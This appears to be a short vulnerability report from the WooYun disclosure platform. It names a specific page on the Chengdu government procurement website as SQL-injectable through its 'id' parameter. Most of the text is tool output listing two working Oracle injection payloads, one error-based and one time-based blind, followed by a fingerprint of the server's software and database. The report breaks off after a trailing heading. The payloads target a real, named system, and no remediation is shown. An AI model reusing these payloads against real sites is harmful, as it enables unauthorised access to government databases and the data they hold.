WooYun.org

成都政府采购网
http://www.cd-procurement.gov.cn/zfcgsite/Secondary/BulletinInfo.aspx?nav_id=01010000&id=-44

注入点：
http://www.cd-procurement.gov.cn/zfcgsite/product/ProductInfo.aspx?id=7054 (GET)
Place: GET
Parameter: id
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=7054' AND 2871=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2871=2871) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(119)||CHR(117)||CHR(113)||CHR(62))) FROM DUAL) AND 'dKdc'='dKdc
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=7054' AND 9809=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(79)||CHR(104)||CHR(103),5) AND 'uKNX'='uKNX
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Oracle

相对应：